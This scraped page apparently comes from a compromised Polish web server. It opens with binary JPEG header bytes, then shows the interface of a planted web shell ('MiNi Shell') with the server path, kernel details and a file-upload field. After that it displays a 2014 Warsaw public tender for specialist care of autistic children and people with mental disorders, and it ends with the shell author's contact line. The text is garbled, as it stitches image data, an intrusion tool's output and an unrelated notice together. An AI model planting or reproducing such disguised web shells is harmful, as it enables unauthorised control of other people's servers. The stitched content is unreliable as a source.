JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141222/417236-N-2014.html

<p class="kh_header"><b>Warszawa: Specjalistyczne usługi opiekuńcze dla dzieci z zaburzeniami rozwojowymi, w tym z autyzmem oraz dla osób z zaburzeniami psychicznymi ( w tym z niepełnosprawnością intelektualną).</b><br>
<b>Numer ogłoszenia: 417236 - 2014; data zamieszczenia: 22.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Ursynów m.st.  Warszawy , ul. Cybisa 7, 02-784 Warszawa, woj. mazowieckie, tel. 0-22 544 12 00, faks 0-22 544 12 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-ursynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Specjalistyczne usługi opiekuńcze dla dzieci z zaburzeniami rozwojowymi, w tym z autyzmem oraz dla osób z zaburzeniami psychicznymi ( w tym z niepełnosprawnością intelektualną)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest - świadczenie Specjalistycznych usług opiekuńczych :
- Część I przedmiotu zamówienia - Specjalistyczne usługi opiekuńcze dla dzieci
z zaburzeniami rozwojowymi, w tym z autyzmem - 5 000 godzin usług,  dla średnio 40 osób miesięcznie,  z zastrzeżeniem, że liczba ta może ulec zmianie, 
- Część II przedmiotu zamówienia - Specjalistyczne usługi opiekuńcze dla osób
z zaburzeniami psychicznymi ( w tym z niepełnosprawnością intelektualną) - 3 578 godzin usług,  dla średnio 30 osób miesięcznie, z zastrzeżeniem, że liczba ta może ulec zmianie. 
Przedmiot zamówienia wg Wspólnego Słownika Zamówień (CPV) określa kod : 
85312120-6 (Usługi opieki dziennej nad dziećmi i młodzieżą niepełnosprawną) - część I przedmiotu zamówienia.
85312000-9 (Usługi opieki społecznej nieobejmujące miejsc noclegowych) - część II przedmiotu zamówienia. 
Termin realizacji zamówienia w okresie od 19.01.2015 r. do 18.12.2015 r.
Szczegółowy opis przedmiotu zamówienia określony został w załączniku Nr 1A do SIWZ w stosunku do części I przedmiotu zamówienia oraz w załączniku Nr 1B do SIWZ w stosunku do części II przedmiotu zamówienia; 
W związku z niemożnością dokładnego określenia wielkości zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia maksymalnie o 20 % liczby osób oraz godzin usług podanych w ust 1. Ewentualne zmniejszenie wielkości zamówienia nie będzie skutkowało odpowiedzialnością Zamawiającego. 
Wartość przedmiotu zamówienia będzie iloczynem podanej przez Wykonawcę ceny 1 godziny usługi brutto i przewidywanej (w okresie trwania umowy) liczby godzin usług, natomiast wartość zrealizowanego zamówienia będzie wynikała z iloczynu 1 godz. usługi i faktycznej liczby wypracowanych godzin usług. 
7. Zamówienie musi zostać wykonane zgodnie z: 
 a) ustawą z dnia 12 marca 2004 roku o pomocy społecznej (tekst jedn. Dz. U. z 2013 r.,
poz. 182 ze zm.); 
 b) rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 22 września 2005 r.
w sprawie specjalistycznych usług opiekuńczych (Dz. U. Nr 189, poz. 1598 ze zm.); 
 c) ustawą z dnia 19 sierpnia 1994 roku o ochronie zdrowia psychicznego 
(t.j.  Dz. U. z 2011 r. Nr 231, poz. 1375 ze zm.); 
 d) Uchwałą Nr XXXVII/843/2004 Rady m.st. Warszawy z dnia 16 września 2004 r. w sprawie szczegółowych warunków przyznawania i odpłatności za usługi opiekuńcze oraz warunków zwrotu wydatków za świadczenia z  pomocy społecznej realizowane przez m.st. Warszawę
Usługi będą świadczone w miejscu zamieszkania oraz w szczególnie uzasadnionych przypadkach poza miejscem zamieszkania, na terenie m.st. Warszawy, przez 7 dni w tygodniu, w godzinach ustalonych wspólnie przez terapeutę i usługobiorcę. Wykonawca musi zapewnić realizację usług
w godzinach od 7.00 do 21.00. 
Wykonawca zobowiązany jest zapewnić kontakt telefoniczny z wyznaczonym przez niego pracownikiem (np. koordynatorem usług), w trakcie wykonywania dyżurów u usługobiorców.
Rozliczenie usług: do dnia 7 każdego miesiąca w obecności pracownika socjalnego pełniącego nadzór nad realizacją usług wraz z kopiami indywidualnych kart pracy terapeutów (oryginały do wglądu), comiesięcznymi sprawozdaniami z realizacji usług oraz indywidualnym planem terapeutycznym wypełnianym nie później niż miesiąc od momentu rozpoczęcia usług, aktualizowanym po 6 miesiącach- na załącznikach zgodnych z umową. Kontrola jakości usług- średnio raz na 4 miesiące.
Uzupełnieniem opisu przedmiotu zamówienia są warunki zawarte we wzorze umów stanowiącym Załącznik nr 8A do SIWZ w stosunku do części I przedmiotu zamówienia oraz w Załączniku Nr 8B do SIWZ w stosunku do części II przedmiotu zamówienia. Dla każdej z części przedmiotu zamówienia zostanie zawarta oddzielna umowa..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Wartość zamówienia uzupełniającego nie przekroczy 50% wartości zamówienia podstawowego i będzie polegała na powtórzeniu tego samego rodzaju zamówień dla każdej z części przedmiotu zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6, 85.31.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla I części przedmiotu zamówienia - Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że : w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje (dot. świadczeń okresowych lub ciągłych) co najmniej 3 usługi  z zakresu specjalistycznych usług opiekuńczych
w tym dla dzieci z zaburzeniami rozwojowymi i z autyzmem, o łącznej wartości 300 000,00 zł, których należyte wykonanie potwierdzone zostanie przez Wykonawcę załączonymi do oferty dokumentami, np. referencjami.
Dla II części przedmiotu zamówienia - Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że : w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje (dot. świadczeń okresowych lub ciągłych) co najmniej 3 umowy  z zakresu specjalistycznych usług opiekuńczych, dla osób z zaburzeniami psychicznymi (w tym z niepełnosprawnością intelektualną), których należyte wykonanie potwierdzone zostanie przez Wykonawcę załączonymi do oferty dokumentami, np. referencjami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla I części przedmiotu zamówienia - Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje: 
A. co najmniej 20 osób przewidzianych do realizacji usług o następujących kwalifikacjach: 
1) psycholog - co najmniej 5, 
2) pedagog w tym pedagog specjalny- 8 osób,
3) terapeuta zajęciowy- 1 osoba, 
4)  logopeda- 5 osób,
5) rehabilitant-fizjoterapeuta- 1 osoba.
B. Zamawiający wymaga, aby osoby przewidziane do realizacji usług posiadały udokumentowane przeszkolenie oraz co najmniej półroczne doświadczenie w zawodzie psychologa, pedagoga w tym pedagoga specjalnego, terapeuty zajęciowego, logopedy, rehabilitanta- fizjoterapeuty,  w placówkach terapii lub w placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwojowymi, w tym z autyzmem a w szczególności                w zakresie:
prowadzenia treningów samoobsługi,
wspomagania procesu uczenia się,
prowadzenia treningów umiejętności społecznych,
usprawniania zaburzonych funkcji organizmu,
- wspomagania procesu terapeutycznego poza miejscem zamieszkania.
C. Usługi mogą być świadczone w środowisku przez więcej niż 1 terapeutę, za zgodą opiekuna dziecka.
D. Zamawiający zastrzega, że w każdym środowisku w ciągu trwania umowy mogą być dokonane maksymalnie 2 zmiany terapeutów świadczących usługi, wynikające z przyczyn leżących po stronie Wykonawcy. Informacja o zmianach musi być przekazana w ciągu trzech dni roboczych telefonicznie do osoby upoważnionej przez Zamawiającego. Każda kolejna zmiana musi być uargumentowana przez Wykonawcę  w formie pisemnej w ciągu trzech dni roboczych, dokonana za wiedzą i zgodą Zamawiającego. 
E. Zamawiający dopuszcza realizację usług przez inne osoby (nie wymienione w ofercie),
po uzyskaniu uprzedniej zgody Zamawiającego  z zastrzeżeniem, że osoby te muszą posiadać kwalifikacje co najmniej równoznaczne z kwalifikacjami osób wymienionych w ofercie. 
F. Osoba pełniąca funkcję koordynatora specjalistycznych usług opiekuńczych powinna posiadać kwalifikacje i staż oraz doświadczenie obejmujące minimum 3 lata pracy na tym stanowisku. Osoba pełniąca funkcję koordynatora nie może pełnić roli terapeuty.
Dla II części przedmiotu zamówienia - Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje: 
A. co najmniej 15 osób przewidzianych do realizacji usług o następujących kwalifikacjach:
1. pracownika socjalnego,
2. psychologa - co najmniej 4
3. pedagoga - co najmniej 3,
4. pielęgniarki,
5. asystenta osoby niepełnosprawnej,
6. terapeuty zajęciowego,
7. fizjoterapeuty bądź innego zawodu uprawniającego do wykonywania specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi (w tym z niepełnosprawnością intelektualną).
B. Zamawiający wymaga, aby osoby przewidziane do realizacji usług posiadały co najmniej półroczne, udokumentowane przeszkolenie i doświadczenie w jednej z następujących placówek:
1. szpitalu psychiatrycznym, 
2. jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi, 
3. ośrodku terapeutyczno- edukacyjno- wychowawczym, 
4. innej jednostce niż wymienione w pkt. 1-3 świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi
oraz przeszły szkolenie w zakresie: 
- umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań,
- kształtowania nawyków celowej aktywności,
- prowadzenia treningu zachowań społecznych.
C. Usługi mogą być świadczone w środowisku przez więcej niż 1 terapeutę, za zgodą osoby zainteresowanej bądź jej opiekuna prawnego.
D. Zamawiający zastrzega, że w każdym środowisku w ciągu trwania umowy mogą być dokonane maksymalnie 2 zmiany terapeutów świadczących usługi, wynikające z przyczyn leżących po stronie Wykonawcy. Informacja o zmianach musi być przekazana w ciągu trzech dni roboczych telefonicznie do osoby upoważnionej przez Zamawiającego. Każda kolejna zmiana musi być uargumentowana przez Wykonawcę  w formie pisemnej w ciągu trzech dni roboczych, dokonana za wiedzą  i zgodą Zamawiającego. 
E. Zamawiający dopuszcza realizację usług przez inne osoby (nie wymienione w ofercie), po uzyskaniu uprzedniej zgody Zamawiającego  z zastrzeżeniem, że osoby te muszą posiadać kwalifikacje co najmniej równoznaczne z kwalifikacjami osób wymienionych w ofercie. 
F. Osoba pełniąca funkcję koordynatora specjalistycznych usług opiekuńczych powinna posiadać kwalifikacje oraz doświadczenie obejmujące minimum 3 lata pracy na tym stanowisku. Osoba pełniąca funkcję koordynatora nie może pełnić roli terapeuty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że posiada opłacone ubezpieczenie od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności, zgodnej
z przedmiotem niniejszego zamówienia, o wartości nie mniejszej niż 100 000,00 zł.
Uwaga : Wykonawca przystępując zarówno do I jak i do II części przedmiotu zamówienia winien przedłożyć opłacone ubezpieczenie od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności, zgodnej z przedmiotem niniejszego zamówienia, o wartości
nie mniejszej niż 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz wymienionych wcześniej dokumentów i oświadczeń do oferty załączyć należy: oryginały pełnomocnictw, o których mowa w rozdziale IV ust. 3 i rozdziale VI ust. 6 SIWZ (o ile ustanowiono), dopuszcza się kopie notarialnie potwierdzone.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświadczenie personelu - 20</li>
<li>3 - potencjał kadrowy personelu - 10</li>
<li>4 - dodatkowa oferta dla odbiorców - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany umowy w rozumieniu art. 144 ust. 1 ustawy Pzp w przypadku zmiany prawa lub wystąpienia innych okoliczności, których nie można było przewidzieć, a które uniemożliwiałyby wykonanie  umowy zgodnie z jej treścią i celem w szczególności: 
1) zmiany stawki podatku VAT w przypadku zmiany przepisów ustawy o podatku od towarów i usług i podatku akcyzowym w odniesieniu odpowiednio do całości  lub danej części wartości zamówienia, którego zmiana dotyczy, przy czym wartość brutto określona w umowie jest wartością stałą. 
2) obniżenie lub zwiększenie liczby usługobiorców korzystających z usług wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany. 
3) obniżenie ilości/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany.
4) zmiany zakresu czynności wchodzących w skład usług w sytuacji gdy z przyczyn niezależnych od zamawiającego pojawi się taka konieczność.
5) zmiany terminu rozpoczęcia realizacji usług, w sytuacji, gdy Zamawiający, z przyczyn od siebie nie zależnych, nie zdoła wyłonić Wykonawcy w terminie pozwalającym na rozpoczęcie realizacji usług w wyznaczonym przez Zamawiającego terminie; Każdorazowa zmiana treści umowy musi mieć formę pisemnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-ursynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej Dzielnicy Ursynów m.st. Warszawy, ul. Jana Cybisa 7, pok. 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2014 godzina 11:45, miejsce: Ośrodek Pomocy Społecznej Dzielnicy Ursynów m.st. Warszawy, ul. Jana Cybisa 7, Punkt Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com